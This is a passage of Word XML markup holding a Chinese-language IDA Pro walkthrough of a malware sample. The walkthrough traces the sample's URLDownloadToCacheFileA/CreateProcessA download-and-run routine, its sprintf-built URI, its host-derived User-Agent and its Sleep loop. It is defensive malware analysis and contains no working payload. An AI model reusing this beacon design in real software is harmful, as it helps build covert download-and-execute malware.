          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第二个例子中，可以清晰看出User-Agent字符串并不是硬编码的，也并非是从多个可选字符串中选择的。</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IDA pro分析</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查看字符串列表</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3107055" cy="3240405"/>
            <wp:effectExtent l="0" t="0" r="190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3107055" cy="3240405"/>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查看导入表</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2785745" cy="3867785"/>
            <wp:effectExtent l="0" t="0" r="317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785745" cy="3867785"/>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可以看到用于信令输出的函数是URLDownloadToCacheFileA。COM API接口的使用与动态测试结果相吻合，使用COM API接口时，http请求的大部分内容都来自windows内部</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也就是不同主机生成不同的User-Agent字符串，其中每一个都与IE浏览器的User-Agent字符串一致。</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检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>URLDownloadToCacheFileA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>交叉引用</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937635" cy="821055"/>
            <wp:effectExtent l="0" t="0" r="952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3937635" cy="821055"/>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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3824605" cy="920750"/>
            <wp:effectExtent l="0" t="0" r="63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3824605" cy="920750"/>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URLDownloadToCacheFileA似乎是唯一使用的网络函数，继续在0x004011A3位置分析包含这一调用的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_4011A3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</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491230" cy="2872740"/>
            <wp:effectExtent l="0" t="0" r="1397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91230" cy="2872740"/>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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3285490" cy="298005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285490" cy="2980055"/>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发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_4011A3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>包含了URLDownloadToCacheFileA和CreateprocessA的调用。将这个函数重命名为downloadNRun。</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在downloadNRun函数中，留意URLDownloadToCacheFileA函数调用之前的内容，以下是一个被引用的字符串：</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4131945" cy="184785"/>
            <wp:effectExtent l="0" t="0" r="13335"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131945" cy="184785"/>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这个字符串作为sprintf函数调用的输入，而其输出作为URLDownloadToCacheFileA函数调用的参数。从格式化的字符串中看到PNG文件的文件名是被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>定义的单个字符，URI的中间部分被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%s定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>义。</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向前跟踪，查找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%s和%c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>参数的输入点。</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3491230" cy="2872740"/>
            <wp:effectExtent l="0" t="0" r="1397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3491230" cy="2872740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>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上面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（0x004011AC~0x004011DB）是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>准备将参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%s和%c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>传到sprintf函数。0x004011D7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>入栈，0x004011DB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>%s参</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数压入栈。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>004011</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>DB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>处push的是%s的内容，ecx来自arg_0,arg_0是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Run函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（sub_4011A3）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的唯一参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>004011</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>7处push的是%c的内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>004011</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0通过strlen获取arg_0字符串的长度，保存在var_218</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将%s的最后一个字符复制到作为%c的局部变量var_214中。因此，在最终的URI中，文件名%c总是字符串%s最后一个字符。这解释了在两个例子中文件名都是a字符的原因：因为它与最后一个字符一致。</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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3215005" cy="838200"/>
            <wp:effectExtent l="0" t="0" r="63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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3215005" cy="838200"/>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查看downloadNRun函数（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_4011A3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）的交叉引用，找到main函数，其中包括Sleep循环和对downloadNRun函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（sub_4011A3）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的引用。</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center"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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182620" cy="1935480"/>
            <wp:effectExtent l="0" t="0" r="254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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3182620" cy="1935480"/>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307080" cy="2583180"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3307080" cy="2583180"/>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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3272155" cy="3298825"/>
            <wp:effectExtent l="0" t="0" r="4445" b="825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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3272155" cy="3298825"/>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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>download</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_4011A3</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的参数往上可见是来自sub_4010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>BB</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分析sub_4010BB</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380105" cy="2324100"/>
            <wp:effectExtent l="0" t="0" r="3175" b="762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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3380105" cy="2324100"/>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282950" cy="3227070"/>
            <wp:effectExtent l="0" t="0" r="8890" b="381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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3282950" cy="3227070"/>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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3293110" cy="2263775"/>
            <wp:effectExtent l="0" t="0" r="13970" b="698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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3293110" cy="2263775"/>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sub_4010BB包含两个子例程，一个子例程是strlen函数。另一个例程是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub_401000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
